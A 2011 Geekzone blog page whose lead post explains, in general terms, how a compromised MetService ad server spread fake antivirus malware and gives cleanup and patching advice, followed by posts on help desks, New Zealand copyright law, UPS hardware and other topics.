My window to the world


Cleaning up the Metservice infection

By Mauricio Freitas, in , posted: 18-Aug-2011 10:02

During the Great New Zealand Snowstorm 2011 the MetService web site was probably one of the most visited in the country. Unfortunately someone thought it would also be a great time to break into Metservice's online advertising platform and plant a little Trojan horse.

What happened is that when serving the ads the MetService web site was also unknowingly distributing a third party piece of code. This little piece of code would be executed by the users' web browser and silently download and install malware on the visitors' computers.

To make it clear: you wouldn't need to click an ad to load this malware, as its code was being loaded directly from the ad server and executed by your browser. The infection wasn't delivered by an ad. In the delivery method could be applied to any other database driven website. It's not an "online advertising problem".

Here is the official MetService email I received when they started the clean up process on their server:

At around 8pm last night, Tuesday 16 August, MetService's web support team identified an issue with its ad server. The ad server was immediately shut down to protect client browsers and prevent further problems; at no time was metservice.com unavailable to the public. Prior to this we had received no reports of any issues.We now know that the ad server was compromised by a malicious attack, through a vulnerability which allowed someone to upload a binary file into the database. This file contained JavaScript code which redirects the browser to a website which downloads malware files to the client machine.

Over the past week, MetService's website has experienced record numbers of visitors due to the severe weather being experienced across the country. The site has handled this record traffic well. The popularity of the site no doubt made it a target for this attack.

An upgrade incorporating a fix is now being installed in order to resolve the issue. The ad server database is also in the process of being cleaned and rebuilt. We have responded to tweets on the issue starting just before 10am this morning, and will continue to respond to users' concerns as they arise.

While there's still an ongoing discussion on Geekzone (where it seems it was first reported), at least one of the installed malware is Personal Shield Pro, a fake security program that will collect personal information, all while pretending to be a legitimate program - and at some point might even ask for credit card details to unlock the "cleaning" feature, obviously not doing anything.

It seems the malware was planted through the execution of a Javascript code that would call a Java program (Javascript and Java are two different things). The Java program seemed to take advantage of a known vulnerability and use it to load the final program into the computer. It looks like the program itself would not be loaded directly by the browser, so it had to do it through Java. In this case it seems people running old versions of Java were the ones infected.

It's also not clear the third party software was distributing one, two or more variants of malware - it's possible that the software could be installing different types of malware depending on what browser was being used, or what operating system version the PC is running, etc.

From the information we managed to collect on Geekzone, the main infection was really Personal Shield Pro. This can be removed with Malwarebytes, a free software (although with a Pro paid version with more features).

To remove the Personal Shield Pro follow these steps:

  • Reboot your PC and press F8 just before Windows starts running
  • On the boot options screen select "Safe Mode with Network"
  • Download Malwarebytes and install
  • Run a full scan and accept its suggestions

This should clear the infection.

Obviously your PC could get contaminated again with the same thing if it stumbles upon another web sites carrying the same or similar code. Here are some tips to keep it safe:

  • Make sure your Windows PC is always up-to-date with the latest patches and browser versions. If you are running Windows XP make sure you have Service Pack 3 installed and all Windows Updates after that. If you are running Windows 7 make sure you have Service Pack 1 and all Windows Updates after that. You should check for new Windows Updates every second Wednesday (New Zealand time), which is the day Microsoft releases those updates. You should actually set Windows Update to automatically download and install updates.
  • If you are running Internet Explorer on Windows XP you should have Internet Explorer 8. If you are running Internet Explorer on Windows 7 you should have Internet Explorer 9.
  • If you are running other browser (Chrome, Firefox, Opera, Safari) you should check that you are running their latest updates.
  • If you are running any other program (specially ones that plug into your browser) make sure you always have all updates installed. This includes Java runtime, Skype plugins, Toolbars and any other program that changes the browser behaviour.
  • You should install one antivirus program (free or paid) but not more than one. Multiple antivirus programs on the same PC will cause problems.
  • Earlier this year I posted a blog entry with links to a list of free security programs and you should read it.

If anyone is in the security community and could add or update any information posted here about this specific incident, please contact me. I'm also blocking comments in this blog post to avoid the predictable "Windows vs Mac OS vs Linux vs " or "Internet Explorer vs Firefox vs Chrome" flame wars.

UPDATE: for those interested in finding out how the Metservice ad server was compromised, this is a good read.

UPDATE: Although the JAVA runtime is multi platform, the final payload affected only Windows PCs. All of you running Mac OS X, Linux, iPads and other devices will not be affected.



To the good ISP people on Geekzone

By Mauricio Freitas, in , posted: 16-Aug-2011 15:37

In a previous blog post I lashed at service companies that have problems with their help desk experience, and probably gave the impression the contribution some of their people give in online media is not welcome.

That's not the case. They all do a great work out there, fronting up for the company, enduring some rude comments from people with no social skills (those who keep shouting "mine, mine, mine") and so on.

The post was about the broken processes, not about the people.

Here at Geekzone we can find some examples of great contributors, and I will list them in no particular order (ok, will try and put company names in alphabetical order, and if I forget any, please remind me):



The broken help desk problem (Twitter will not fix it, you have to do it from inside)

By Mauricio Freitas, in , posted: 16-Aug-2011 12:23

Social media Online channels cure everything! Twitter Social media help is here for you!

Twitter is a 140 char medium, and it seems people can't just get a tweet for what it is trying to convey (a personal opinion). Some people take it as a personal offence if something bad regarding an industry or activity is said - even when not directed at them. And some people expect a dissertation in 140 chars. So here is my "extended version".

It started when I posted this tweet: "Most annoying sentence used on Twitter is 'Sorry, how can we help?'... What about start with better, faster customer service to everyone?"

This is what I think. Extending that sentence, service providers' help desk experience is so broken that people gets to Twitter (and other venues like Facebook, Geekzone, etc) to complain, and only then get some action from the online team that rush with a "Sorry you are having problems, how can we help?".

My tweet came from years of reading about help desk interactions on Twitter and Geekzone. Mostly of what I've read are horror stories. Usually there's a long wait (45 minutes is not unheard of, sometimes hours), a promise of a call back (that never happen), fault details that are never logged and when customer calls back the help desk says "this is the first I hear about it", the "Contact Us" pages that are supposed to get people in contact with the Help Desk via email, but no replies even come back and so on.

So, my thought on "how can we help" is still "improve your customer service experience and make it work". This is not for telcos only, but all industries.

After my tweet, I got a reply from Paul Brislen, TUANZ CEO: "because usually that's the first time you hear the customer has an issue. Blissful ignorance before that point."

It may be. Sure, there are some cases in which customers don't even take the time to call the help desk. But that's not always the case.

Why would some customers go to online channels first instead of calling the help desk? Because they suspect no results will come out of that contact, and a friend of a friend told her "to post on Twitter, it's like a priority queue".

To the customers: this is the wrong approach folks, because it's not helping the provider to "build a case". If you call the help desk and get a call logged, then with time there's a wealth of knowledge that can help everyone else.

To the providers: if customers call the help desk, but nothing is logged, then the help desk is not helping themselves (except for creating the illusion of "quick resolution" and "high number of cases closed")*.

Customer service using online channels (I dislike "social media") have a seemingly priority tag assigned. Sorry, but it looks like they are there to put out fires so their reputation is not too damaged.

Of course online channels can be used, for example as crowdsourced data sensor network, allowing providers to collect data indicating something is wrong. For example Telco A sees a wave of people complaining about broken services, for example slow iTunes downloads or intermittent problems accessing smh.com.au? This is probably faster and more accurate than their own data sensors in pointing out a bottleneck to the local distribution network, or a problem with their proxy servers.

Strangely I don't see this happening much, yet. If it is then it's not publicised.

There are many problems with "support" on Twitter and other channels. Authentication is one - how do you know this is the customer who can actually take actions on this account? Or how do you even know this is the actual customer, not some impersonator? Then it's the technical problem, because it's really hard to get some meaningful troubleshooting information on 140 characters. But most importantly it is probably extremely hard to scale support on Twitter.

So, please fix your help desk. Provide excellent customer service, then I'd really believe you are using social media online channels for things other than putting out fires.

 

* Some time ago there were reports of mobile data connection problems with Vodafone and subsequent discussion. I might be wrong (Vodafone welcome to post in the comments), but from what I found in talking to people, customers would call to log a fault, help desk would ask the customer to turn off the handset, remove the battery, wait five minutes and turn the phone on again. It would always "fix the problem" so no no fault logged. In my opinion the mobile operator missed the important information that a lot of people, with different handsets were having connection problems. It wasn't just one model. It wasn't just in one specific location. It was spread across the country. Until someone wrote about it with detailed information and then there was a scramble to get things fixed. This is just an example of not using the knowledge collected from help desk contacts for its advantage.



I’m on heello too

By Mauricio Freitas, in , posted: 11-Aug-2011 11:16

Yes, it's true. The Twitpic crowd has launched heello.com. You can find and follow me at heello.com/freitasm.



P2P will not be illegal in New Zealand

By Mauricio Freitas, in , posted: 3-Aug-2011 14:56

I've seen some comments around saying P2P is illegal come 1st September and the new copyright law is enacted.

To be clear: P2P is not illegal. It's the distribution of copyrighted material without the proper rights to do so that it is.

P2P can also be used for software distribution as well as distribution of content that is no longer copyrighted, or content whose authors decided to make freely available (even if they still retain copyright).

Here are two web sites where you can find content legally available through P2P (torrents):



500,000 replies in forums and the winners...

By Mauricio Freitas, in , posted: 2-Aug-2011 12:24

When I started Geekzone a few years ago I didn't think I was going to meet so many good people around here.

With time and the help of an entire community, in special our volunteer moderators, Geekzone managed to capture a good audience in New Zealand and overseas. Numbers continue to go up, and discussions in our forums continue to attract hundreds of thousands of visitors every month. Those visitors come mainly from New Zealand, but also from U.S., Canada, Australia, the UK and smaller numbers from other countries.

I managed to make new friendships that span the globe. People who I've met over the years in our pizza evenings, coffee meetings and conferences everywhere.

When I saw we were approaching 500,000 replies in our forums, I contacted some of the local telco/tech companies and passed the hat around, asking for some prizes to distribute. The response was really good as you can see below

I intentionally did not announce there would be prizes, because we wanted some genuine post to win. Also we decided to give some "consolation" prizes to people who got close to 500,000 but not quite. So here are the winners and prize list!
To all three winners congratulations, and to everyone else thank you from the team for making Geekzone a great place.



Old UPS out, new UPS in: Eaton

By Mauricio Freitas, in , posted: 26-Jul-2011 20:19

In the last two months a couple of my Belkin UPS (800VA and 1200VA) died. More likely the battery needed replacement anyway. But couldn't come in worst time - with all the power cuts in Wellington due to heating requirements because of the extreme cold, our desktops here at the Geekzone Home Office had a bouncy night...

So www.upspower.co.nz  decided to let me try a couple of their UPS. One small Eaton 3S UPS and the rack mounted/tower Eaton 5PX 1500.

While the Eaton 3S was easy - plug to the wall and plug the couple of devices to it, the Eaton 5PX is a different beast altogether. First it comes in a 35 Kg box. The box comes with sliders and feet, so you chose rack mounted or tower form factor. It's a bit noisy because of a fast fan. But it packs a punch. Just look at the LCD pictures for the up time lower in the post:

















Will be using these for a while here and see how they perform...



Atlantis space shuttle: thanks for all the fish!

By Mauricio Freitas, in , posted: 21-Jul-2011 22:06

Amazing infrared shot of Atlantis (NASA Space Shuttle) after its last landing just few minutes ago:

And a side shot:

Well done Challenger, Endeavour, Discovery and Atlantis. Well done to the crew and control. Amazing to have seen the first flight, and to have seen the last one, over 29 years of space exploration.



Scope of New Zealand copyright law changes limited to P2P file sharing

By Mauricio Freitas, in , posted: 21-Jul-2011 11:59

Sharing a release received from InternetNZ today:

InternetNZ (Internet New Zealand Inc) has obtained clarification from the Ministry of Economic Development (MED) that the intention of the Copyright (Infringing File Sharing) Amendment Act 2011 is to cover copyright infringement by online file sharing using peer-to-peer protocols only.

The new notices and penalty regime introduced by these amendments is not intended to cover video/music streaming websites or online file lockers.

InternetNZ Chief Executive Vikram Kumar says, "What this means is that watching videos on YouTube or via blinkx, streaming music from Grooveshark, and downloading from online file lockers like MediaFire and 4shared will not be subject to the changes introduced by the amendments to the law coming into force on 1 September 2011. MED's confirmation addresses some of the questions that arose when we were looking at the law changes in detail".

"It keeps the scope of the changes narrowly focussed on copyright infringements by online file sharing via peer-to-peer networks and applications. This will be welcomed by many people. However, despite the intentions behind the law, the definitive interpretation will come from decisions made by the Copyright Tribunal and Courts if this aspect of the law is ever tested."

"Streaming websites and online file lockers typically provide copyright owners with a more direct means of enforcing their rights.

Generally, this is achieved by copyright owners providing a notice directly to the website that infringing content is appearing on the site and needs to be removed. For example, YouTube has tools like Content ID and a Copyright Verification Tool that enable copyright owners to easily identify, control, and even remove their content from the site."

"This clarification doesn't mean that copyright infringements by means other than peer-to-peer applications and networks aren't covered by the Copyright Act. The Internet Service Providers' liability provisions inserted by the Copyright (New Technologies) Amendment Act 2008 of general infringement (92B), storing infringing material (92C), and caching (92E) still continue. Rights owners can continue to seek enforcement through the Courts. However, they can't use the new streamlined provisions of sections 122A to 122U for alleged infringements relating to Internet Service Providers' storage and caching of infringing content."

"This is a good time to emphasise that peer-to-peer technologies aren't in themselves bad. Quite the contrary. These technologies provide significant advantages for many legitimate uses, such as eliminating the single point of failure typical of client-server systems and distributing computing resources. For example, peer-to-peer technologies are extensively used by popular services like Facebook, Skype and Twitter as well as for efficient data distribution in scientific research and Linux distributions. So blocking peer-to-peer protocols rather than focussing on copyright infringement in response to the law changes is a bad response."

Explanatory note

"Streaming" is a technique for transferring data so that it can be processed as a steady and continuous stream. This allows a person to start watching online, say a video or TV show, without waiting to get the whole file. Typically, streaming is used in a one-to-many situation. "Peer-to-peer" on the other hand is a distributed architecture where peers are both consumers and suppliers. People can connect directly with other people and is therefore used in a many-to-many situation.

Examples of peer-to-peer protocols include Gnutella and BitTorrent.

Popular peer-to-peer software includes uTorrent, BitComet, FrostWire, Ares, LimeRunner, and Vuze.

Online file lockers are ways for storing and sharing a wide variety of files online. Examples of online file lockers include MediaFire and 4shared.



How Leica lenses are made

By Mauricio Freitas, in , posted: 13-Jul-2011 11:58

A brilliant video showing the technology behind the manufacture of Leica lenses. It explains why lenses are still so expensive:



freitasm's profile

Mauricio Freitas
Wellington
New Zealand


I live in New Zealand and my interests include mobile devices, good books, movies and food of course! 

I work for Intergen and I'm also the Geekzone admin. On Geekzone we publish news, reviews and articles on technology topics. The site also has some busy forums.

Subscribe now to my blog RSS feed or the Geekzone RSS feed.

If you want to contact me, please use this page or email me freitasm@geekzone.co.nz. Note this email is not for technical support. I don't give technical support. You can use our Geekzone Forums for community discussions on technical issues.

Here's is my full disclosure post.

If you'd like to help me keep Geekzone going, please use this Geekzone Amazon affiliate link when placing any orders on Amazon.

A couple of blog posts you should read:

Social networks presence

View Mauricio Freitas's profile on LinkedIn


My Blog by tags...

Blog...
Entrepreneurship...
Media...
Personal...
Technology...
Viral Marketing...
Web Performance Optimization...
Windows...
Windows Phone...

Other recent posts in my blog

Trackers - How technology is h...
Geekzone is a ESET NetGuide We...
Windows Phone and Android apps...
Minister for Economic Developm...
Your NAS and the Bash vulnerab...
Going to Microsoft TechEd New ...
State of Browsers Geekzone Mar...
Free speech...
Testing the Kingston DataTrave...
Telecom enforces SSL email, us...

New posts on Geekzone